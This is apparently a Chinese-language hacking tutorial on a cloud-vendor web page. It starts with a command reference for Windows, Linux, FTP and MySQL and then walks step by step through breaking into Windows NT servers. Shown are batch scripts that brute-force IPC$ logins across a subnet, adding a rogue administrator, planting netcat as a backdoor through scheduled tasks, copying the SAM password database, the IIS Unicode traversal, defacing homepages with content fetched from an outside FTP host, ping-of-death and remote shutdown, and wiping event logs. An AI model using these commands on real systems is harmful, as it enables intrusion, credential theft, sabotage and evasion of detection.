at /delete 停止所有計劃任務,用參數/yes則不需要確認就直接停止
at id號 /delete 停止某個登入的計劃任務
at 查看所有的計劃任務
at //ip time 程式名(或一個命令) /r 在某時間運行對方某程式並重新啟動電腦
finger username @host 查看最近有哪些使用者登陸
telnet ip 連接埠 遠和登陸伺服器,預設連接埠為23
open ip 串連到IP(屬telnet登陸後的命令)
telnet 在本機上直接鍵入telnet 將進入原生telnet
copy 路徑/檔案名稱1 路徑/檔案名稱2 /y 複製檔案1到指定的目錄為檔案2,用參數/y就同時取消確認你要改寫一份現存目錄檔案
copy c:/srv.exe $">//ip/admin$ 複製本地c:/srv.exe到對方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 將2st.txt的內容藏身到1st.jpg中產生3st.jpg新的檔案,註:2st.txt檔案頭要空三排,參數:/b指二進位檔案,/a指ASCLL格式檔案
copy $/svv.exe">//ip/admin$/svv.exe c:/ 或:copy//ip/admin$/*.* 複製對方admini$共用下的srv.exe檔案(所有檔案)至本地C:
xcopy 要複製的檔案或分類樹 目標地址/目錄名 複製檔案和分類樹,用參數/Y將不提示覆蓋相同檔案
tftp -i 自己IP(用肉機作跳板時這用肉機IP) get server.exe c:/server.exe 登陸後,將“IP”的server.exe下載到目標主機c:/server.exe 參數:-i指以二進位模式傳送,如傳送exe檔案時用,如不加-i 則以ASCII模式(傳送文字檔模式)進行傳送
tftp -i 對方IP put c:/server.exe 登陸後,上傳本地c:/server.exe至主機
ftp ip 連接埠 用於上傳檔案至伺服器或進行檔案操作,預設連接埠為21。bin指用二進位方式傳送(可執行檔進);預設為ASCII格式傳送(文字檔時)
route print 顯示出IP路由,將主要顯示網路地址Network addres,子網路遮罩Netmask,網關地址Gateway addres,介面地址Interface
arp 查看和處理ARP緩衝,ARP是名字解析的意思,負責把一個IP解析成一個物理性的MAC地址。arp -a將顯示出全部資訊
start 程式名或命令 /max 或/min 新開一個新視窗並最大化(最小化)運行某程式或命令
mem 查看cpu使用方式
attrib 檔案名稱(目錄名) 查看某檔案(目錄)的屬性
attrib 檔案名稱 -A -R -S -H 或 +A +R +S +H 去掉(添加)某檔案的 存檔,唯讀,系統,隱藏 屬性;用+則是添加為某屬性
dir 查看檔案,參數:/Q顯示檔案及目錄屬系統哪個使用者,/T:C顯示檔案建立時間,/T:A顯示檔案上次被訪問時間,/T:W上次被修改時間
date /t 、 time /t 使用此參數即“DATE/T”、“TIME/T”將只顯示當前日期和時間,而不必輸入新日期和時間
set 指定環境變數名稱=要指派給變數的字元 設定環境變數
set 顯示當前所有的環境變數
set p(或其它字元) 顯示出當前以字元p(或其它字元)開頭的所有環境變數
pause 暫停批次程式,並顯示出:請按任意鍵繼續....
if 在批次程式中執行條件處理(更多說明見if命令及變數)
goto 標籤 將cmd.exe導向到批次程式中帶標籤的行(標籤必須單獨一行,且以冒號打頭,例如:“:start”標籤)
call 路徑/批次檔名 從批次程式中調用另一個批次程式 (更多說明見call /?)
for 對一組檔案中的每一個檔案執行某個特定命令(更多說明見for命令及變數)
echo on或off 開啟或關閉echo,僅用echo不加參數則顯示當前echo設定
echo 資訊 在螢幕上顯示出資訊
echo 資訊 >> pass.txt 將"資訊"儲存到pass.txt檔案中
findstr "Hello" aa.txt 在aa.txt檔案中尋找字串hello
find 檔案名稱 尋找某檔案
title 標題名字 更改CMD視窗標題名字
color 顏色值 設定cmd控制台前景和背景顏色;0=黑、1=藍、2=綠、3=淺綠、4=紅、5=紫、6=黃、7=白、8=灰、9=淡藍、A=淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白
bin 或 image 設定以二進位方式傳送檔案
bell 每完成一次檔案傳送,警示提示
cdup 返回上一級目錄
close 中斷與遠程伺服器的ftp會話(與open對應)
open host[port] 建立指定ftp伺服器串連,可指定串連連接埠
delete 刪除遠端主機中的檔案
mdelete [remote-files] 刪除一批檔案
mkdir directory-name 在遠端主機中建立目錄
rename [from] [to] 改變遠端主機中的檔案名稱
rmdir directory-name 刪除遠端主機中的目錄
status 顯示當前FTP的狀態
system 顯示遠端主機系統類別型
user user-name [password] [account] 重新以別的使用者名稱登入遠端主機
open host [port] 重建立立一個新的串連
prompt 互動提示模式
macdef 定義宏命令
lcd 改變當前本地主機的工作目錄,如果預設,就轉到目前使用者的HOME目錄
chmod 改變遠端主機的檔案許可權
case 當為ON時,用MGET命令拷貝的檔案名稱到本地機器中,全部轉換為小寫字母
cd remote-dir 進入遠程主機目錄
cdup 進入遠程主機目錄的父目錄
! 在本地機中執行互動shell,exit回到ftp環境,如!ls*.zip
MYSQL 命令:
mysql -h主機地址 -u使用者名稱 -p密碼 串連MYSQL;如果剛安裝好MYSQL,超級使用者root是沒有密碼的。
(例:mysql -h110.110.110.110 -Uroot -P123456
注:u與root可以不用加空格,其它也一樣)
exit 退出MYSQL
mysqladmin -u使用者名稱 -p舊密碼 password 新密碼 修改密碼
grant select on 資料庫.* to 使用者名稱@登入主機 identified by /"密碼/"; 增加新使用者。(注意:和上面不同,下面的因為是MYSQL環境中的命令,所以後面都帶一個分號作為命令結束符)
show databases; 顯示資料庫列表。剛開始時才兩個資料庫:mysql和test。mysql庫很重要它裡面有MYSQL的系統資訊,我們改密碼和新增使用者,實際上就是用這個庫進行操作。
use mysql;
show tables; 顯示庫中的資料表
describe 表名; 顯示資料表的結構
create database 庫名; 建庫
use 庫名;
create table 表名 (欄位設定列表); 建表
drop database 庫名;
drop table 表名; 刪庫和刪表
delete from 表名; 將表中記錄清空
select * from 表名; 顯示表中的記錄
mysqldump --opt school>school.bbb 備份資料庫:(命令在DOS的//mysql//bin目錄下執行);注釋:將資料庫school備份到school.bbb檔案,school.bbb是一個文字檔,檔案名稱任取,開啟看看你會有新發現。
win2003系統下新增命令(實用部份):
shutdown /參數 關閉或重啟本地或遠程主機。
參數說明:/S 關閉主機,/R 重啟主機, /T 數字 設定延時的時間,範圍0~180秒之間, /A取消開機,/M //IP 指定的遠程主機。
例:shutdown /r /t 0 立即重啟本地主機(無延時)
taskill /參數 進程名或進程的pid 終止一個或多個任務和進程。
參數說明:/PID 要終止進程的pid,可用tasklist命令獲得各進程的pid,/IM 要終止的進程的進程名,/F 強制終止進程,/T 終止指定的進程及他所啟動的子進程。
tasklist 顯示當前運行在本地和遠程主機上的進程、服務、服務各進程的進程標識符(PID)。
參數說明:/M 列出當前進程載入的dll檔案,/SVC 顯示出每個進程對應的服務,無參數時就只列出當前的進程。
Linux系統下基本命令: 要區分大小寫
uname 顯示版本資訊(同win2K的 ver)
dir 顯示目前的目錄檔案,ls -al 顯示包括隱藏檔案(同win2K的 dir)
pwd 查詢當前所在的目錄位置
cd cd ..回到上一層目錄,注意cd 與..之間有空格。cd /返回到根目錄。
cat 檔案名稱 查看檔案內容
cat >abc.txt 往abc.txt檔案中寫上內容。
more 檔案名稱 以一頁一頁的方式顯示一個文字檔。
cp 複製檔案
mv 移動檔案
rm 檔案名稱 刪除檔案,rm -a 目錄名刪除目錄及子目錄
mkdir 目錄名 建立目錄
rmdir 刪除子目錄,目錄內沒有文檔。
chmod 設定檔案或目錄的存取許可權
grep 在檔案中尋找字串
diff 檔案檔案比較
find 檔案搜尋
date 現在的日期、時間
who 查詢目前和你使用同一台機器的人以及Login時間地點
w 查詢目前上機者的詳細資料
whoami 查看自己的帳號名稱
groups 查看某人的Group
passwd 更改密碼
history 查看自己下過的命令
ps 顯示進程狀態
kill 停止某進程
gcc 駭客通常用它來編譯C語言寫的檔案
su 許可權轉換為指定使用者
telnet IP telnet串連對方主機(同win2K),當出現bash$時就說明串連成功。
ftp ftp串連上某伺服器(同win2K)
附:批處理命令與變數
1:for命令及變數 基本格式:
FOR /參數 %variable IN (set) DO command [command_parameters] %variable:指定一個單一字母可替換的參數,如:%i ,而指定一個變數則用:%%i ,而調用變數時用:%i% ,變數是區分大小寫(%i 不等於 %I)。
批處理每次能處理的變數從%0—%9共10個,其中%0預設給批次檔名使用,%1預設為使用此批處理時輸入的的第一個值,同理:%2—%9指輸入的第2-9個值;例:net use $">//ip/ipc$ pass /user:user 中ip為%1,pass為%2 ,user為%3
(set):指定一個或一組檔案,可使用萬用字元,如:(D:/user.txt)和(1 1 254)(1 -1 254),{“(1 1 254)”第一個"1"指起始值,第二個"1"指增長量,第三個"254"指結束值,即:從1到254;“(1 -1 254)”說明:即從254到1}
command:指定對第個檔案執行的命令,如:net use命令;如要執行多個命令時,命令這間加:& 來隔開
command_parameters:為特定命令指定參數或命令列開關
IN (set):指在(set)中取值;DO command :指執行command
參數:/L 指用增量形式{(set)為增量形式時};/F 指從檔案中不斷取值,直到取完為止{(set)為檔案時,如(d:/pass.txt)時}。
用法舉例:
@echo off
echo 用法格式:test.bat *.*.* > test.txt
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use //%1.%%G /user:administrator | find "命令成功完成" >>test.txt
存為test.bat 說明:對指定的一個C類網段的254個IP依次試建立administrator密碼為空白的IPC$串連,如果成功就把該IP存在test.txt中。
/L指用增量形式(即從1-254或254-1);輸入的IP前面三位:*.*.*為批處理預設的 %1;%%G 為變數(ip的最後一位);& 用來隔開echo 和net use 這二個命令;| 指建立了ipc$後,在結果中用find查看是否有"命令成功完成"資訊;%1.%%G 為完整的IP地址;(1 1 254) 指起始值,增長量,結止值。
@echo off
echo 用法格式:ok.bat ip
FOR /F %%i IN (D:/user.dic) DO smb.exe %1 %%i D:/pass.dic 200
存為:ok.exe 說明:輸入一個IP後,用字典檔案d:/pass.dic來暴解d:/user.dic中的使用者密碼,直到檔案中值取完為止。%%i為使用者名稱;%1為輸入的IP地址(預設)。
net use $">//ip/ipc$ " " /user:" " 建立IPC空連結
net use $">//ip/ipc$ "密碼" /user:"使用者名稱" 建立IPC非空連結
net use h: $">//ip/c$ "密碼" /user:"使用者名稱" 直接登陸後映射對方C:到本地為H:
net use h: $">//ip/c$ 登陸後映射對方C:到本地為H:
net use $">//ip/ipc$ /del 刪除IPC連結
net use h: /del 刪除映射對方到本地的為H:的映射
net user 使用者名稱 密碼 /add 建立使用者
net user guest /active:yes 啟用guest使用者
net user 查看有哪些使用者
net user 帳戶名稱 查看帳戶的屬性
net localgroup administrators 使用者名稱 /add 把“使用者”添加到管理員中使其具有管理員權限,注意:administrator後加s用複數
net start 查看開啟了哪些服務
net start 服務名 開啟服務;(如:net start telnet, net start schedule)
net stop 服務名 停止某服務
net time //目標ip 查看對方時間
net time //目標ip /set 設定本機電腦時間與“目標IP”主機的時間同步,加上參數/yes可取消確認資訊
net view 查看本地區域網路內開啟了哪些共用
net view //ip 查看對方區域網路內開啟了哪些共用
net config 顯示系統網路設定
net logoff 中斷連線的共用
net pause 服務名 暫停某服務
net send ip "文本資訊" 向對方發資訊
net ver 區域網路內正在使用的網路連接類型和資訊
net share 查看本地開啟的共用
net share ipc$ 開啟ipc$共用
net share ipc$ /del 刪除ipc$共用
net share c$ /del 刪除C:共用
net user guest 12345 用guest使用者登陸後用將密碼改為12345
net password 密碼 更改系統登陸密碼
netstat -a 查看開啟了哪些連接埠,常用netstat -an
netstat -n 查看連接埠的網路連接情況,常用netstat -an
netstat -v 查看進行中的工作
netstat -p 協議名 例:netstat -p tcq/ip 查看某協議使用方式(查看tcp/ip協議使用方式)
netstat -s 查看正在使用的所有協議使用方式
nbtstat -A ip 對方136到139其中一個連接埠開了的話,就可查看對方最近登陸的使用者名稱(03前的為使用者名稱)-注意:參數-A要大寫
tracert -參數 ip(或電腦名稱) 跟蹤路由(資料包),參數:“-w數字”用於設定逾時間隔。
ping ip(或網域名稱) 向對方主機發送預設大小為32位元組的資料,參數:“-l[空格]資料包大小”;“-n發送資料次數”;“-t”指一直ping。
ping -t -l 65550 ip 死亡之ping(發送大於64K的檔案並一直ping就成了死亡之ping)
ipconfig (winipcfg) 用於windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用參數“/all”顯示全部配置資訊
tlist -t 以樹行列表顯示進程(為系統的附加工具,預設是沒有安裝的,在安裝目錄的Support/tools檔案夾內)
kill -F 進程名 加-F參數後強制結束某進程(為系統的附加工具,預設是沒有安裝的,在安裝目錄的Support/tools檔案夾內)
del -F 檔案名稱 加-F參數後就可刪除唯讀檔案,/AR、/AH、/AS、/AA分別表示刪除唯讀、隱藏、系統、封存檔案,/A-R、/A-H、/A-S、/A-A表示刪除除唯讀、隱藏、系統、存檔以外的檔案。例如“DEL/AR *.*”表示刪除目前的目錄下所有唯讀檔案,“DEL/A-S *.*”表示刪除目前的目錄下除系統檔案以外的所有檔案
del /S /Q 目錄 或用:rmdir /s /Q 目錄 /S刪除目錄及目錄下的所有子目錄和檔案。同時使用參數/Q 可取消刪除操作時的系統確認就直接刪除。(二個命令作用相同)
move 盤符/路徑/要移動的檔案名稱 存放移動檔案的路徑/移動後檔案名稱 移動檔案,用參數/y將取消確認移動目錄存在相同檔案的提示就直接覆蓋
fc one.txt two.txt > 3st.txt 對比二個檔案並把不同之處輸出到3st.txt檔案中,"> "和"> >" 是重新導向命令
at id號 開啟登入的某個計劃任務
1、NET
只要你擁有某IP的使用者名稱和密碼,那就用IPC$做串連吧!
這裡我們假如你得到的使用者是hbx,密碼是123456。假設對方IP為127.0.0.1
net use //127.0.0.1/ipc$ 123456 /user:hbx
退出的命令是
net use //127.0.0.1/ipc$ /delte
下面的操作你必須登陸後才可以用,登陸的方法就在上面。
下面我們講怎麼建立一個使用者,由於SA的許可權相當於系統的超級使用者。我們加一個heibai的使用者密碼為lovechina
net user heibai lovechina /add
只要顯示命令成功,那麼我們可以把他加入Administrator組了。
net localgroup Administrators heibai /add
這裡是講映射對方的C盤,當然其他盤也可以,只要存在就行了。我們這裡把對方的C盤映射到本地的Z盤,
net use z://127.0.0.1/c$
net start telnet
這樣可以開啟對方的TELNET服務。
這裡是將Guest使用者啟用,guest是NT的預設使用者,而且無法刪除呢?不知道是否這樣,我的Windows2000就是刪除不了它。
這裡是把一個使用者的密碼改掉,我們把guest的密碼改為lovechina,其他使用者也可以的。只要有許可權就行了呀!
net user guest lovechina
net命令果然強大啊!
2、At
一般一個入侵者入侵後都會留下後門,也就是種木馬了,你把木馬傳了上去,怎麼啟動他呢?那麼需要用AT命令,這裡假設你已經登陸了那個伺服器。你首先要得到對方的時間,
net time //127.0.0.1
將會返回一個時間,這裡假設時間為12:1,現在需要建立一個作業,其ID=1
at //127.0.0.1 12:3 nc.exe
這裡假設了一個木馬,名為NC.EXE,這個東西要在對方伺服器上。
這裡介紹一下NC,NC是NETCAT的簡稱,為了方便輸入,一般會被改名。它是一個TELNET服務,連接埠為99。等到了12:3就可以串連到對方的99連接埠,這樣就給對方種下了木馬。
3、Telnet
這個命令非常實用,它可以與遠方做串連,不過正常下要求輸入密碼、使用者,不過你給對方種了木馬,直接連到這個木馬開啟的連接埠。
telnet 127.0.0.1 99
這樣就可以連到對方的99連接埠,那你就可以在對方運行命令了,這個也就是肉雞。
4、FTP
它可以將你的東西傳到對方機子上,你可以去申請個支援FTP上傳的空間,國內多的是,如果真的找不到,我給個www.51.NET,不錯的。當我們申請完後,它會給使用者名稱,密碼,以及FTP伺服器。在上傳前需要登陸先,這裡我們假設FTP伺服器是www.51.NET,使用者名稱是HUCJS,密碼是654321。
他會要求輸入使用者,成功後會要求輸入密碼。
下面先說上傳,假設你需上傳的檔案是INDEX.HTM,它位於C:/下,傳到對方D:/
get c:/index.htm d:/
假設你要把對方C盤下的INDEX.HTM,下到你的機子的D盤下
put c:/index.htm d:/
5、Copy
下面我說說怎樣把本地的檔案複製到對方硬碟上去,需要建立好IPC$串連才有效。這裡我們把本地C盤下的index.htm複製到127.0.0.1的C盤下
copy index.htm //127.0.0.1/c$/index.htm
如果你要複製到D盤下把C改為D,就行了!
如果你要把他複製到WINNT目錄裡,就要把輸入
copy index.htm //127.0.0.1/admin$/index.htm
admin$是winnt
要把對方的檔案複製過來,順便告訴大家NT的備份的資料庫放在x:/winnt/repair/sam._ sam._是資料庫的檔案名稱。下面就把127.0.0.1的資料庫複寫到本地C盤下
copy //127.0.0.1/admin$/repair/sam._ c:/
6、Set
如果你跑進了一部機子,而且想黑他(這思想只能在特別時候才准有),當然他的80連接埠要開,不然你黑給誰看。這時需要用SET命令!下面是我得到的結果!我來分析它,只是找首頁在那而已。
COMPUTERNAME=PENTIUMII
ComSpec=D:/WINNT/system32/cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=當前登陸者的IP,這裡本來是顯示我的IP,被我刪除了
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:/WINNT/system32/os2/dll;
OS=Windows_NT
Path=D:/WINNT/system32;D:/WINNT
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=E:/vlroot首頁放在的地址,只要你看到PATH_TRANSLATED=的後面就是首頁的存放地
址。這裡是E:/vlroot
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=$P$G
QUERY_STRING=/c+set
REMOTE_ADDR=XX.XX.XX.XX
REMOTE_HOST=XX.XX.XX.XX
REQUEST_METHOD=GET
SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe
SERVER_NAME=XX.XX.XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.1
SERVER_SOFTWARE=Microsoft-IIS/3.0對方使用IIS/3.0
SystemDrive=D:
SystemRoot=D:/WINNT
TZ=GMT-9
USERPROFILE=D:/WINNT/Profiles/Default User
windir=D:/WINNT
粉紅色的那行就是對方首頁存放地址,這裡告訴大家一個技巧,很笨的技巧啊,不過只能用這個方法才能100%的找到首頁的名稱,當你DIR這個目錄時,一定會看到很多檔案,你可以把所有檔案在瀏覽器這樣輸入XX.XX.XX.XX/檔案名稱,這樣只要看到和XX.XX.XX.XX看到的也面一模一樣,那麼這就是首頁的名稱了。
7、Nbtstat
如果你掃到一部NT的機子,他的136到139其中一個連接埠開了的話,就要用這個命令得到使用者了。順便告訴大家這是netbios,得到使用者名稱後就可以猜猜密碼了。例如比較簡單的密碼,密碼和使用者名稱一樣的,都試下,不行就暴力破解吧!
現在網上很多NT的機子都開了這些連接埠的,你可以練習下,我們來分析得到的結果。命令是
nbtstat -A XX.XX.XX.XX
-A一定要大寫哦,下面是得到的結果。
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
Registered Registered Registered Registered Registered Registered Registered Reg
istered Registered Registered Registered
MAC Address = 00-E0-29-14-35-BA
PENTIUMII <00> UNIQUE
PENTIUMII <20> UNIQUE
ORAHOTOWN <00> GROUP
ORAHOTOWN <1C> GROUP
ORAHOTOWN <1B> UNIQUE
PENTIUMII <03> UNIQUE
INet~Services <1C> GROUP
IS~PENTIUMII...<00> UNIQUE
ORAHOTOWN <1E> GROUP
ORAHOTOWN <1D> UNIQUE
..__MSBROWSE__.<01> GROUP
粉紅色的就是登陸過這部系統的使用者,可能你不知道怎麼看,大家是不是看到了一竄數字,只要這竄數字是<03>的話,那他前面的就是使用者,這裡的使用者是PENTIUMII。
8、Shutdown
關了對方的NT伺服器的命令
Shutdown //IP地址 t:20
20秒後將NT自動關閉,三思後才能運行這個命令,這樣對對方造很大的損失,要做個有良心的入侵者呀。
9、DIR
這個命令沒什麼好講,但是卻非常重要,他是查看一目錄裡的所有檔案、檔案夾。你可以本地試下。
10、Echo
著名的漏洞Unicode,這個命令可以簡單的黑一下有這個漏洞的主機。我們假設我們要把“南京大屠殺鐵證如山,任何***人不得抵賴!”寫入index.htm,有2種方法,大家看看有什麼區別。
echo 南京大屠殺鐵證如山,任何***人不得抵賴!>index.htm
echo 南京大屠殺鐵證如山,任何***人不得抵賴!>>index.htm
第一個的意思是覆蓋index.htm原有的內容,把“南京大屠殺鐵證如山,任何***人不得抵賴!”寫進index.htm;第二個的意思是把“南京大屠殺鐵證如山,任何***人不得抵賴!”加到index.htm裡面。
“>>”產生的內容將追加進檔案中,“>”則將原檔案內容覆蓋。大家可以本地試下。
可能你會問,這樣簡單黑下有什麼好玩的,其實他可以用來下載首頁到對方的目錄裡。
(1)首先,我們需要申請一個免費的首頁空間。
(2)用echo在可寫目錄下建立如下內容的txt檔案:(以chinren伺服器為例。)
open upload.chinaren.com(你的FTP伺服器,申請時你的空間供應商會給你的)
cnhack(你申請時的使用者名稱)
test(你申請時的密碼)
get index.htm c:/inetpub/wwwroot/index.htm
(這裡是把你空間上的index.htm下載到對方的c:/inetpub/wwwroot/index.htm)
bye(退出FTP對話,相當在98下的DOS,用EXIT退出DOS)
具體的做法:
輸入 echo open upload.chinaren.com> c:/cnhack.txt
輸入 echo cnhack >> c:/cnhack.txt
輸入 echo 39abs >> c:/cnhack.txt
輸入 echo get index.htm c:/inetpub/wwwroot/index.htm+>>+c:/cnhack.txt
最後輸入 ftp -s:c:/cnhack.txt (利用ftp的-s參數,執行檔案裡的內容。)等命令完成時,檔案已經下載到你指定的檔案裡了。
注意:取得檔案後,請刪除cnhack.txt。(如果不刪除,很容易會給別人看到你的密碼。) 記得要 del c:/cnhack.txt。
11、Attrib
這個命令是設定檔案屬性的。如果你想黑一個站,而他的首頁的檔案屬性設定了唯讀,那就很可憐呀,想刪除他也不行,想覆蓋他也不行。不過有這個命令就別怕了。
attrib -r index.htm
這個命令是把index.htm的唯讀屬性去掉。如果把“-”改為“+”則是把這個檔案的屬性設定為唯讀。
attrib +r index.htm
這個命令是把index.htm的屬性設定為唯讀。
12、Del
當你看到這個標題可別倒下啊!現在要離開127.0.0.1了,要刪除日誌,當然要刪除日誌啦!想被捉嗎,呵呵。NT的日誌有這些
del C:/winnt/system32/logfiles/*.*
del C:/winnt/ssytem32/config/*.evt
del C:/winnt/system32/dtclog/*.*
del C:/winnt/system32/*.log
del C:/winnt/system32/*.txt
del C:/winnt/*.txt
del C:/winnt/*.log
只要刪除這些就可以了,有些系統NT安裝在D盤或其他盤,就要把C改成其他盤。
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
